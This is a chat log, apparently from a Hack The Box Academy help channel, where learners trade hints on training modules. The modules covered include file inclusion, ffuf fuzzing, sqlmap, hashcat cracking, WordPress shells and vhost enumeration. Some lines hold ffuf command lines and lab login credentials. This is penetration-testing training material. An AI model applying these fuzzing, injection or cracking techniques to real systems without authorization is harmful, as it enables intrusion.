Hello lads, are we allowed to share youtube videos here?
nice i cant even access the target
Doesn't look like you are doing it right. You aren't connected to HTB's VPN.
Does this task require downloading a VPN key?
No
So, then your VM has an issue
@gleaming gate Which module and task is this?
File Inclusion > RFI
You do need.
🤷‍♂️
really
;-;
oh it loaded
lfg
excuse me
i literally do what the section suggests
tf
Nvm found a way to fix it
JUST SHUT UP ALREADY OMFG
try tryhackme.com they have great shit
It's literally saying Permission denied because you have insufficient perms, I think you know how to fix it
lol
If it says permission denied, most likely yes
what is the password for pwnbox
If you mean on the pwnbox, seclists is installed already in the /opt/useful directory
Can someone help me with the "Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer" question of Linux fundamentals ?
I always got the answer 48 and I can't see what's wrong with the command
Check the very first line of your output.
yes, I see but even 47 isn't accepted
this one takes some trimming and cutting.
Can you send your command over in DM? @dry pumice
yeah
@dry pumice So basically you need to have just the URL on each line and then you can sort it out and count only unique lines. Step one, get just the URL on each line
Hi windows priv escla > initial Enumeration> Question: What type of session does this user have? any help i cant get it .. thanks nvm
anyone done Intro to Network Traffic Analysis
Yes
thanks, I found my answer.
Okay, great
just fyi i got past the module, i just think i had an issue upgrading my console once i got the reverse shell. when i redid my whole process today it worked flawlessly and i could scroll/look through all the content i needed to.
anybody have time to help me finish ffuf?
im trying to find a wordlist that doesnt appear as a wordlist or a directory on my system. I tried using the locate command and I get a handful of other wordlists
im trying to
but when I run sqlmap
it shows that it isn't injectable
any tips?
those F'in Linemen
get em
Im not currently in sqlmap right now, i'm in ffuf
DM
do u still need help
u need to create a custom wordlist using the bash oneliner
that works
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
this doesnt
i think im a little confused as to what values I need to replace in that general command above
DM me
Hello guys I have been having this issue for a bit. I'm doing the OSINT: CORPORATE RECON on academy. In the Domain Structure section. It told me to get the hosting provider for it. I am pretty sure that I have the answer: ||Digital Ocean||. However it isn't accepting that answer. I think it might just be a formatting issue or something even though I've tried. Also whois network command isn't working. Dig and ping work just fine, just whois isn't. Has anybody had this issue? Help would be highly appreciated. Thanks
I have another question about ffuf, if I cant locate a wordlist in a directory where the exercise says it is located, how do I find it? Or where do I download the list from? I tried the 'locate' command but it doesnt turn up the same path nor the same txt file.
sometimes the path may be different
thanks I will try find this time
hello, i seem to be stuck in the file inclusion /directory traversal module. the hardening section. can anyone help?
it says to edit the php.ini file to block system() function but the file is owned by root and no write permissions for htb-student so im confused
dm
you need to go back and look at copy as curl. You might also look at part of that section that your sqlmap statement is missing.
are you looking for seclist?
yes, but locate and find doesnt find the list
are you using pwnbox or your own setup?
on pwnbox it is in /opt/useful. On my Kali distro I had to download it from github. https://github.com/danielmiessler/SecLists
Hello, I am new to HTB and have trouble about windows fundamentals module, the part about NTFS and sharing permissions. I managed to find method for solving problem about firewall but now a new one: SMB1 disabled -- no workgroup available. Help me please 😢
which section?
NTFS vs. Share Permissions
and what question?
I didn't got to the questions, I could not connect to the folder through the smbclient
xfreerdp ?
yeah
like this?
xfreerdp /v:10.129.43.22 /u:htb-student /p:Academy_WinFun!
yes
can you show the exact error?
"SMB1 disabled -- no workgroup available." Also, before this error, there was one more about firewall, usually you need to disable public firewall in windows settings to continue.
are you using smbclient or xfreerdp?
both. xfreerdp for connecting to windows, and smbclient for connecting to folder
I think you should be able to answer the problems just using xfreerdp
then powershell
this one is just from reading the section
but the task says differently. the point is to connect through smbclient to shared problem
yeah
you dont need to xfreerdp before running the client here
what do you mean? In the task I need to connect to xfreerdp windows folder (that is shared) through the smbclient
where does it say that?
why would you use smbclient to check shares of a box you are already on?
can you show me the description of the task?
Alright I am going to bed. I would recommend only using smbclient OR xfree, I dont think you need to use both at the same time.
for the 3 questions at the end, all 3 can be answered without using smbclient or xfree, just reading and understanding the section. Good luck
I am sorry guys but I can not type anywhere else
how do I log in into root please ?
I tried my password and I tried everything, nothing works
HTB academy
I am doing my first challenge
I need to add a user but it asks me for a password
nothing works
sorry on which challenge
linux fundamentals
Theres a text file on the desktop with a password in it that will let you run sudo.
on which section
oh my god my hero
maaan I wasted 1 hour to figure that password out
Thank you for showing me the full format.
Any tips for Cracking Common Passwords from the 'Cracking Passwords with Hashcat' module? I'm stuck since yesterday trying all sorts of rules and modes with no luck...
Hello! Can anyone help me with the "hacking Wordpress" skill assessment. I am stuck with the shell part. I have a shell up and can run commands like whoami, pwd, ls. But how do i run commands like "ls and a specific folder"?
If you're using the method of RCE using a theme, you may need to url encode any spaces in your command
If I misunderstood your question let me know.
@swift carbon I have tried %20 but not sure if that is a space or not. The thing is that i dont get an error message. If i do it in the browser i get a blank page and the terminal just gives me a new line.
Hmm. Yea I think %20 is space. DM me so we don't post spoilers in chat
Hi, I have a question regarding the module 'Information Gathering'.
I am being asked : Target: 10.129.214.235
vHosts needed for these questions:
app.inlanefreight.local
dev.inlanefreight.local
Which CMS is used on app.inlanefreight.local? (Format: word)
I understand that I need to use the tool whatweb to identify the CMS used. However this notion of vHosts drives me crazy
I am given an IP address and two subdomains
When I send a request to the given IP address, I get the message 'This is the inlanefreight.local default vhost'. I do not understand what those subdomains are, and which domain I should use with whatweb
Hi everyone i was just wondering if anyone has done the bug bounty hunter path here? if so how long did it take you/how much time did you put in a day? thanks
I would say I work 10 hours a day and each module takes between half a day to a day, some 2 days. Unless I get stuck then it could take a week
The subdomain is the app and the dev. The main domain is inlanefreight.local
Thanks appreciate it!
cant we connect to target by our own host os?
I understand, but what is the link with the IP address that has been given to me ? I believe 'inlanefreight.local' is linked to the IP address if I consider the message it returns to me
Do you mean the target IP and the domain right?
yes I'm talking about the target IP
?
If you don't use pwnbox you need to use the academy vpn
Think of the IP address as the address of your home, and the website is accessing one of the ports. Think of a port as a door, and there are a lot of doors. The default for the website is port 80. If you type on your web browser without specifying the port, it will automatically go to port 80. The relation between the vHost and the target IP is that the vHosts have the same port, in this case port 80. But there are two subdomains, in this case app and dev. Hope that answers your question.
so to solve these problem we have to use their instance
No you can use a machine and a vpn
It is not recommended to just use your personal machine without first getting a virtual machine
perfect
you need that
should be next to a question, only need to download once tho
then you have to run something like that
depending on where you put the file
mine is obviously on my desktop
i tried that but then also i cant ping
after a successful connection?
hey its working now
yee!
Happy Wednesday!
For CMS tech, you can use Wappalyzer. For some websites it can see what tech they are using, for some not. But at first, you need to visit the website.
It's actually a browser extension that you can install
Yes, they do mention it in the course, along with the tool whatweb in the CL
however this domain cannot be the target of the tools as it does not even resolve. I believe there's a link between the target IP and this 'app' subdomain
If there isn't anything there, try to visit the website, view the page source and try to google it manually. || I also do that in one of the boxes in HTB.||
For me , trying to Google every possible name if it's relevant or not. If you are lucky, then you can find it one.
Did you add the vhosts to /etc/hosts?
Forgot to say that, Thanks for adding :)
Hey everyone, I'm stuck on SQLmap essentials - Skills Assessment
I found the attack vector and my sqlmap displayed all the tables within the database however, I am unable to get the contents of the table with the flag. When I run sqlmap now with my working command I get 'Connection refused'
I could use a hint here
DM me
Hai! Cracking passwords with hashcat skill assessment last question. Download a file crack some hashes and then find the most common password.
Now i managed to track the password or well ish. I get a file with a lot of passwords tho just 1 of each password so its quite a few less rows than the original document. I need some assistance where to go from here. Do i miss something while cracking or do i need to compare the files and so on. I rly cant find the help in the module.
Whats good fam? This question?
@livid pier yeah that one
Ok when you run hashcat you should notice it says ~1000 hashes then ~800 unique hashes
when you do --show it is showing you the 800 unique passwords
thats why it is looking like you are only getting 1 password match
What I did was take the og hash list into python and make a dictionary of it. I found the most common hash, then ran that against the cracked hashes I had
Hmm.. i need to get a bit more tech savvy and filter out the hashes first then. Cheers!
python split(':')
That will help you
from collections import Counter
will also help to make the dictionary
Cheers
yee!
Anyone around to offer guidance on the cross site scripting final question? -- NVM I got it.
2>/dev/null It's not supposed to return anything. It rather redirects all error messages to trash
oh really?
2 stands for stderr - feel free to Google what this is. And then google also what /dev/null is :)
Okay, that makes sense, so when I run the ffuf command to scour the wordlist and I include 2>/dev/null it just idles there with no output
where can i see that?
it says pwnbox base
pwnbox
ffuf -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt:FUZZ -u http://academy.htb:30799/ -H 'Host: FUZZ.academy.htb' 2>/dev/null
^Z
zsh: suspended ffuf -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt:FUZZ -u -H 2
so what now?
then what do i do?
Looks like you are VHost fuzzing
What are you trying to do? are you stuck?
oh shoot i just realised im talking about the meow bot lol
idk how to connect the vpn for it
I am but the standard error command is causing it not to work
Define standard error command for me. I am not sure what you are referring to.
Or tell me what you are trying to achieve with that redirect at the end.
connect to meow bot with vpn
click connect to htb
k i did that
For the Top picture when I use the '2>/dev/null' to stop the errors from occurring, it doesnt run the command line at all
but if i do it with pwnbox i only get 2 hours
lol well ya that is a whole other problem
im trying to do openvpn
I recommend getting kali
k
that would be what you use kali for
sup i am new here
so how do i get kali just search for it
So the second screenshot looks alright, no?
you need to install virtual box
first
so just a virtual box?
yea
Yes its running with errors, albeit super slow
is it oracle vm virtual box?
@muted kite Ohhhh, OK. Now I understand what you are referring to
yes
@muted kite You need to filter out your results
This guide is about virtualizing Kali Linux inside of VirtualBox, allowing you to have a Kali VM. This is a great way to use Kali, as it is completely separate from the host, allows you to interact with other VMs (as well as the host machine and other machines on the network), and allows you to revert to snapshots.
I havent used that but it should work
which virtual box do i get?
whats the best way to filter out results?
omg is it pre-installed ??
im on 2560/5000

